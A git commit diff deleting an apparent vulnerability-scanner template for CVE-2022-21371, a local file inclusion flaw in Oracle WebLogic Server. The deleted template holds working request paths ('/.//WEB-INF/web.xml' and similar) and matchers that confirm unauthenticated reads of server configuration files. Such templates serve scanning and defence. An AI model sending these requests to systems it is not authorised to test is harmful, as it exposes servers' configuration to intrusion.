Removing temporarily due to limited information

patch-1
sandeep 2022-01-28 16:58:30 +05:30
parent 9fa97d4221
commit 57d742bfb4
1 changed files with 0 additions and 37 deletions

View File

@ -1,37 +0,0 @@
id: CVE-2022-21371
info:
name: Oracle WebLogic Server LFI
author: paradessia,narluin
severity: high
description: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
reference:
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21371
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2022-21371
tags: cve,cve2022,lfi,weblogic,oracle
requests:
- method: GET
path:
- "{{BaseURL}}/.//WEB-INF/web.xml"
- "{{BaseURL}}/.//WEB-INF/portlet.xml"
- "{{BaseURL}}/.//WEB-INF/weblogic.xml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
- "</web-app>"
condition: and
- type: status
status:
- 200